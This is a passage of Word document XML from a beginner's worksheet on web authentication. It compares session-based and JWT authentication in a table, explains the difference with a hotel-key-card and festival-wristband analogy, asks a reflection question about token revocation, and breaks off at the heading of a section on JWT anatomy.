              <w:spacing w:after="0" w:before="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0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:i/>
                <w:iCs/>
                <w:color w:val="7A849C"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"/>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7360"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="single" w:color="C5CBDA" w:sz="4"/>
              <w:right w:val="none" w:color="FFFFFF" w:sz="0"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:type="dxa" w:w="0"/>
              <w:left w:type="dxa" w:w="0"/>
              <w:bottom w:type="dxa" w:w="0"/>
              <w:right w:type="dxa" w:w="0"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pP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Borders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:right w:val="none" w:color="FFFFFF" w:sz="0"/>
            </w:tcBorders>
            <w:shd w:fill="0D1B3E" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="160"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="160"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="44"/>
                <w:szCs w:val="44"/>
              </w:rPr>
              <w:t xml:space="preserve">04</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:right w:val="none" w:color="FFFFFF" w:sz="0"/>
            </w:tcBorders>
            <w:shd w:fill="4A148C" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="160"/>
              <w:left w:type="dxa" w:w="280"/>
              <w:bottom w:type="dxa" w:w="160"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="34"/>
                <w:szCs w:val="34"/>
              </w:rPr>
              <w:t xml:space="preserve">Session vs JWT — Side-by-Side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6CC" w:sz="4"/>
              <w:left w:val="single" w:color="0066CC" w:sz="24"/>
              <w:bottom w:val="single" w:color="0066CC" w:sz="4"/>
              <w:right w:val="single" w:color="0066CC" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="EAF4FF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="120"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="120"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="80" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1A3A6E"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">👉  DO THIS IN THE APP</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1A1D2E"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Go to Module 04 in the app.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1A1D2E"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Read both columns carefully — left column is Sessions (red), right column is JWT (green).</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1A1D2E"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">For each row, make sure you understand WHY the difference exists before moving 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40"/>
        <w:gridCol w:w="4720"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4640"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="999999" w:sz="4"/>
              <w:left w:val="single" w:color="999999" w:sz="4"/>
              <w:bottom w:val="single" w:color="999999" w:sz="4"/>
              <w:right w:val="single" w:color="999999" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="8B0000" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="160"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="160"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">🔴  Session Auth</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4720"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="999999" w:sz="4"/>
              <w:left w:val="single" w:color="999999" w:sz="4"/>
              <w:bottom w:val="single" w:color="999999" w:sz="4"/>
              <w:right w:val="single" w:color="999999" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="005C3D" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="160"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="160"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">🟢  JWT Auth</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4640"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:left w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:bottom w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:right w:val="single" w:color="CCCCCC" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="FFF0F0" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="160"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="160"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="8B0000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Server stores session data in RAM</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4720"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:left w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:bottom w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:right w:val="single" w:color="CCCCCC" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="F0FFF5" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="160"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="160"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="005C3D"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">No server storage — token lives on client</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="46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before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="8B0000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Stateful (server remembers state)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="472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before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="005C3D"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Stateless (token carries the state)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4640"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:left w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:bottom w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:right w:val="single" w:color="CCCCCC" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="FFF0F0" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="160"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="160"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="8B0000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Breaks when server restarts</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4720"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:left w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:bottom w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:right w:val="single" w:color="CCCCCC" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="F0FFF5" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="160"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="160"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="005C3D"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Works after server restart</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="46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before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="8B0000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Hard to scale to multiple servers</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="472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before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="005C3D"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Scales perfectly across many servers</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4640"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:left w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:bottom w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:right w:val="single" w:color="CCCCCC" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="FFF0F0" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="160"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="160"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="8B0000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Uses cookies (CSRF attack risk)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4720"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:left w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:bottom w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:right w:val="single" w:color="CCCCCC" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="F0FFF5" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="160"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="160"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="005C3D"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Uses Authorization header (no CSRF)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="46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before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="8B0000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Easy to revoke (delete session)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="472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before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="005C3D"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Hard to revoke early — must wait for expiry</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4640"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:left w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:bottom w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:right w:val="single" w:color="CCCCCC" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="FFF0F0" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="160"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="160"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="8B0000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Works great for web browsers</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4720"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:left w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:bottom w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:right w:val="single" w:color="CCCCCC" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="F0FFF5" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="160"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="160"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="005C3D"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Works great for APIs, mobile, microservices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CBDA" w:sz="4"/>
              <w:left w:val="single" w:color="C5CBDA" w:sz="20"/>
              <w:bottom w:val="single" w:color="C5CBDA" w:sz="4"/>
              <w:right w:val="single" w:color="C5CBDA" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="F5F6FA" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="120"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="120"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="0D1B3E"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">Real-world analogy to remember this forever:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="50" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="8B0000"/>
                <w:sz w:val="23"/>
                <w:szCs w:val="23"/>
              </w:rPr>
              <w:t xml:space="preserve">🏨  Session = </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1A1D2E"/>
                <w:sz w:val="23"/>
                <w:szCs w:val="23"/>
              </w:rPr>
              <w:t xml:space="preserve">Hotel key card system. The hotel front desk has a computer that knows which room cards are active. If the system reboots, all cards stop working. If you go to a different hotel branch, your card does not work there.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="00875A"/>
                <w:sz w:val="23"/>
                <w:szCs w:val="23"/>
              </w:rPr>
              <w:t xml:space="preserve">🎪  JWT = </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1A1D2E"/>
                <w:sz w:val="23"/>
                <w:szCs w:val="23"/>
              </w:rPr>
              <w:t xml:space="preserve">Festival wristband. All your access info is encoded in the wristband itself. Any security guard at any gate can read it. If the main office burns down, your wristband still works.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B75" w:sz="4"/>
              <w:left w:val="single" w:color="006B75" w:sz="24"/>
              <w:bottom w:val="single" w:color="006B75" w:sz="4"/>
              <w:right w:val="single" w:color="006B75" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="E0F4F5" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="120"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="120"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="80" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="006B75"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">✏️  THINK ABOUT IT</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1A1D2E"/>
                <w:sz w:val="23"/>
                <w:szCs w:val="23"/>
              </w:rPr>
              <w:t xml:space="preserve">Sessions have one advantage over JWT — can you find it in the comparison table above? Why is it harder with JWT?</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:i/>
                <w:iCs/>
                <w:color w:val="7A849C"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Look at the 'revoke' row carefully.</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0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:i/>
                <w:iCs/>
                <w:color w:val="7A849C"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Session's one advantage:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7360"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="single" w:color="C5CBDA" w:sz="4"/>
              <w:right w:val="none" w:color="FFFFFF" w:sz="0"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:type="dxa" w:w="0"/>
              <w:left w:type="dxa" w:w="0"/>
              <w:bottom w:type="dxa" w:w="0"/>
              <w:right w:type="dxa" w:w="0"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="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0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:i/>
                <w:iCs/>
                <w:color w:val="7A849C"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Why JWT makes this harder:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7360"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="single" w:color="C5CBDA" w:sz="4"/>
              <w:right w:val="none" w:color="FFFFFF" w:sz="0"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:type="dxa" w:w="0"/>
              <w:left w:type="dxa" w:w="0"/>
              <w:bottom w:type="dxa" w:w="0"/>
              <w:right w:type="dxa" w:w="0"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pP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Borders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:right w:val="none" w:color="FFFFFF" w:sz="0"/>
            </w:tcBorders>
            <w:shd w:fill="0D1B3E" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="160"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="160"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="44"/>
                <w:szCs w:val="44"/>
              </w:rPr>
              <w:t xml:space="preserve">05</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:right w:val="none" w:color="FFFFFF" w:sz="0"/>
            </w:tcBorders>
            <w:shd w:fill="7A4800" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="160"/>
              <w:left w:type="dxa" w:w="280"/>
              <w:bottom w:type="dxa" w:w="160"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="34"/>
                <w:szCs w:val="34"/>
              </w:rPr>
              <w:t xml:space="preserve">Inside a JWT — Token Anatomy</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="120"/>
      </w:pPr>
